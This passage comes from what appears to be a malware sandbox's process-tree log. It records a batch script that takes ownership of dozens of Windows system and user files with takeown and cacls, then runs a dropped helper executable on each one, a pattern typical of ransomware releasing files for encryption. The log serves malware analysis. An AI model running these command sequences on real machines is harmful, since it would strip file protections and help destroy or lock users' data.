  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets""
  2⤵
  PID:4284
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets" /E /G Admin:F /C
    3⤵
    PID:2536
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets"
    3⤵
    PID:300
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner
    3⤵
    PID:1856
  - - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
      hbFC3HC7.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner
      4⤵
      PID:5020
- - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
    hbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2952
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files (x86)\Windows Photo Viewer\es-ES\PhotoAcq.dll.mui""
  2⤵
  PID:4364
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\es-ES\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:4572
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\es-ES\PhotoAcq.dll.mui"
    3⤵
    - Modifies file permissions
    PID:3540
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:2812
  - - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
      hbFC3HC7.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      PID:2832
- - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
    hbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:332
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\PhotoAcq.dll.mui""
  2⤵
  PID:4244
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1812
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\PhotoAcq.dll.mui"
    3⤵
    - Modifies file permissions
    PID:2692
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:1332
  - - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
      hbFC3HC7.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      PID:640
- - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
    hbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1032
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.e2f832ce-4b0e-4e72-befe-61d8bcc2c7ec.1.etl""
  2⤵
  PID:3160
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.e2f832ce-4b0e-4e72-befe-61d8bcc2c7ec.1.etl" /E /G Admin:F /C
    3⤵
    PID:3676
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.e2f832ce-4b0e-4e72-befe-61d8bcc2c7ec.1.etl"
    3⤵
    PID:3644
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "UpdateSessionOrchestration.e2f832ce-4b0e-4e72-befe-61d8bcc2c7ec.1.etl" -nobanner
    3⤵
    PID:4536
  - - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
      hbFC3HC7.exe -accepteula "UpdateSessionOrchestration.e2f832ce-4b0e-4e72-befe-61d8bcc2c7ec.1.etl" -nobanner
      4⤵
      PID:4224
- - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
    hbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4464
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui""
  2⤵
  PID:2496
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:3568
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui"
    3⤵
    - Modifies file permissions
    PID:1668
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:1488
  - - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
      hbFC3HC7.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      PID:3896
- - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
    hbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4360
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files (x86)\Windows Photo Viewer\it-IT\PhotoViewer.dll.mui""
  2⤵
  PID:4208
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\it-IT\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:3976
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\it-IT\PhotoViewer.dll.mui"
    3⤵
    - Modifies file permissions
    PID:4684
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:5096
  - - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
      hbFC3HC7.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      PID:4556
- - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
    hbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3620
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\ProgramData\USOShared\Logs\System\WuProvider.921df37c-b309-4109-8c4a-2cd21962ab35.1.etl""
  2⤵
  PID:4756
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOShared\Logs\System\WuProvider.921df37c-b309-4109-8c4a-2cd21962ab35.1.etl" /E /G Admin:F /C
    3⤵
    PID:4788
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOShared\Logs\System\WuProvider.921df37c-b309-4109-8c4a-2cd21962ab35.1.etl"
    3⤵
    - Modifies file permissions
    PID:2232
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "WuProvider.921df37c-b309-4109-8c4a-2cd21962ab35.1.etl" -nobanner
    3⤵
    PID:2560
  - - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
      hbFC3HC7.exe -accepteula "WuProvider.921df37c-b309-4109-8c4a-2cd21962ab35.1.etl" -nobanner
      4⤵
      PID:1860
- - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
    hbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4984
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files (x86)\Windows Photo Viewer\de-DE\PhotoAcq.dll.mui""
  2⤵
  PID:1864
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\de-DE\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:2292
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\de-DE\PhotoAcq.dll.mui"
    3⤵
    - Modifies file permissions
    PID:4924
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:548
  - - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
      hbFC3HC7.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      PID:4768
- - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
    hbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3592
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\PhotoViewer.dll.mui""
  2⤵
  PID:4052
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:4148
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\PhotoViewer.dll.mui"
    3⤵
    - Modifies file permissions
    PID:3504
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:3484
  - - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
      hbFC3HC7.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      PID:1132
- - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
    hbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1524
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui""
  2⤵
  PID:2744
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:5060
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui"
    3⤵
    - Modifies file permissions
    PID:4828
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:3728
  - - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
      hbFC3HC7.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      PID:1620
- - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
    hbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4708
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files (x86)\Windows Photo Viewer\it-IT\ImagingDevices.exe.mui""
  2⤵
  PID:1808
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\it-IT\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:428
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\it-IT\ImagingDevices.exe.mui"
    3⤵
    - Modifies file permissions
    PID:3328
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:4764
  - - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
      hbFC3HC7.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      PID:1232
- - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
    hbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1496
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.7a2de38e-949f-499d-a7e9-32fec9ad3dcd.1.etl""
  2⤵
  PID:1544
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.7a2de38e-949f-499d-a7e9-32fec9ad3dcd.1.etl" /E /G Admin:F /C
    3⤵
    PID:3832
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.7a2de38e-949f-499d-a7e9-32fec9ad3dcd.1.etl"
    3⤵
    - Modifies file permissions
    PID:5000
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "UpdateSessionOrchestration.7a2de38e-949f-499d-a7e9-32fec9ad3dcd.1.etl" -nobanner
    3⤵
    PID:2216
  - - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
      hbFC3HC7.exe -accepteula "UpdateSessionOrchestration.7a2de38e-949f-499d-a7e9-32fec9ad3dcd.1.etl" -nobanner
      4⤵
      PID:4520
- - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
    hbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4140
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\ProgramData\USOShared\Logs\System\NotificationUxBroker.cd09c61e-9532-450b-b7b3-7b652f7242c0.1.etl""
  2⤵
  PID:5092
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOShared\Logs\System\NotificationUxBroker.cd09c61e-9532-450b-b7b3-7b652f7242c0.1.etl" /E /G Admin:F /C
    3⤵
    PID:1156
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOShared\Logs\System\NotificationUxBroker.cd09c61e-9532-450b-b7b3-7b652f7242c0.1.etl"
    3⤵
    PID:3068
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "NotificationUxBroker.cd09c61e-9532-450b-b7b3-7b652f7242c0.1.etl" -nobanner
    3⤵
    PID:1164
  - - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
      hbFC3HC7.exe -accepteula "NotificationUxBroker.cd09c61e-9532-450b-b7b3-7b652f7242c0.1.etl" -nobanner
      4⤵
      PID:676
- - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
    hbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4124
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\ProgramData\USOShared\Logs\System\NotificationUxBroker.1fc87425-c5fb-454c-8d3a-131a11dfac63.1.etl""
  2⤵
  PID:2332
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOShared\Logs\System\NotificationUxBroker.1fc87425-c5fb-454c-8d3a-131a11dfac63.1.etl" /E /G Admin:F /C
    3⤵
    PID:4852
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOShared\Logs\System\NotificationUxBroker.1fc87425-c5fb-454c-8d3a-131a11dfac63.1.etl"
    3⤵
    - Modifies file permissions
    PID:3744
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "NotificationUxBroker.1fc87425-c5fb-454c-8d3a-131a11dfac63.1.etl" -nobanner
    3⤵
    PID:4396
  - - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
      hbFC3HC7.exe -accepteula "NotificationUxBroker.1fc87425-c5fb-454c-8d3a-131a11dfac63.1.etl" -nobanner
      4⤵
      PID:1052
- - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
    hbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2664
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Users\Admin\AppData\Local\Microsoft\GameDVR\KnownGameList.bin""
  2⤵
  PID:3104
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\GameDVR\KnownGameList.bin" /E /G Admin:F /C
    3⤵
    PID:5088
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\GameDVR\KnownGameList.bin"
    3⤵
    - Modifies file permissions
    PID:4228
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "KnownGameList.bin" -nobanner
    3⤵
    PID:4216
  - - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
      hbFC3HC7.exe -accepteula "KnownGameList.bin" -nobanner
      4⤵
      PID:3976
- - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
    hbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4684
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.5e2fe5c7-5b22-43a2-b74d-97686fd70486.1.etl""
  2⤵
  PID:744
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.5e2fe5c7-5b22-43a2-b74d-97686fd70486.1.etl" /E /G Admin:F /C
    3⤵
    PID:1848
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.5e2fe5c7-5b22-43a2-b74d-97686fd70486.1.etl"
    3⤵
    - Modifies file permissions
    PID:4716
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "UpdateSessionOrchestration.5e2fe5c7-5b22-43a2-b74d-97686fd70486.1.etl" -nobanner
    3⤵
    PID:3048
  - - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
      hbFC3HC7.exe -accepteula "UpdateSessionOrchestration.5e2fe5c7-5b22-43a2-b74d-97686fd70486.1.etl" -nobanner
      4⤵
      PID:3904
- - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
    hbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2368
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Settings\settings.dat""
  2⤵
  PID:3524
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Settings\settings.dat" /E /G Admin:F /C
    3⤵
    PID:860
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Settings\settings.dat"
    3⤵
    - Modifies file permissions
    PID:2980
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "settings.dat" -nobanner
    3⤵
    PID:4720
  - - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
      hbFC3HC7.exe -accepteula "settings.dat" -nobanner
      4⤵
      PID:4088
- - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
    hbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4924
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png""
  2⤵
  PID:3784
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png" /E /G Admin:F /C
    3⤵
    PID:1888
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png"
    3⤵
    PID:2116
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "device.png" -nobanner
    3⤵
    PID:1340
  - - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
      hbFC3HC7.exe -accepteula "device.png" -nobanner
      4⤵
      PID:1896
- - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
    hbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3472
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png""
  2⤵
  PID:3144
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png" /E /G Admin:F /C
    3⤵
    PID:4896
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png"
    3⤵
    PID:4504
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "background.png" -nobanner
    3⤵
    PID:4760
  - - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
      hbFC3HC7.exe -accepteula "background.png" -nobanner
      4⤵
      PID:4320
- - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
    hbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4828
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Users\All Users\USOShared\Logs\System\WuProvider.dd1e4819-5c57-41d8-98e0-4b7815c08312.1.etl""
  2⤵
  PID:476
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\USOShared\Logs\System\WuProvider.dd1e4819-5c57-41d8-98e0-4b7815c08312.1.etl" /E /G Admin:F /C
    3⤵
    PID:4876
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\USOShared\Logs\System\WuProvider.dd1e4819-5c57-41d8-98e0-4b7815c08312.1.etl"
    3⤵
    - Modifies file permissions
    PID:4952
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "WuProvider.dd1e4819-5c57-41d8-98e0-4b7815c08312.1.etl" -nobanner
    3⤵
    PID:1916
  - - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
      hbFC3HC7.exe -accepteula "WuProvider.dd1e4819-5c57-41d8-98e0-4b7815c08312.1.etl" -nobanner
      4⤵
      PID:4284
- - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
    hbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:740
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Header.bin""
  2⤵
  PID:2640
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Header.bin" /E /G Admin:F /C
    3⤵
    PID:288
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Header.bin"
    3⤵
    PID:4364
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "TileCache_100_0_Header.bin" -nobanner
    3⤵
    PID:5000
  - - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
      hbFC3HC7.exe -accepteula "TileCache_100_0_Header.bin" -nobanner
      4⤵
      PID:2088
- - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
    hbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4520
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Data.bin""
  2⤵
  PID:4800
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Data.bin" /E /G Admin:F /C
    3⤵
    PID:640
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Data.bin"
    3⤵
    - Modifies file permissions
    PID:1156
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "TileCache_100_0_Data.bin" -nobanner
    3⤵
    PID:3068
  - - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
      hbFC3HC7.exe -accepteula "TileCache_100_0_Data.bin" -nobanner
      4⤵
      PID:2272
- - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
    hbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1164
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png""
  2⤵
  PID:2624
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png" /E /G Admin:F /C
    3⤵
    PID:3160
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png"
    3⤵
    - Modifies file permissions
    PID:280
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "overlay.png" -nobanner
    3⤵
    PID:3276
  - - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
      hbFC3HC7.exe -accepteula "overlay.png" -nobanner
      4⤵
      PID:2396
- - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
    hbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3908
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat""
  2⤵
  PID:4164
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat" /E /G Admin:F /C
    3⤵
    PID:1212
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat"
    3⤵
    - Modifies file permissions
    PID:4228
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "settings.dat" -nobanner
    3⤵
    PID:1220
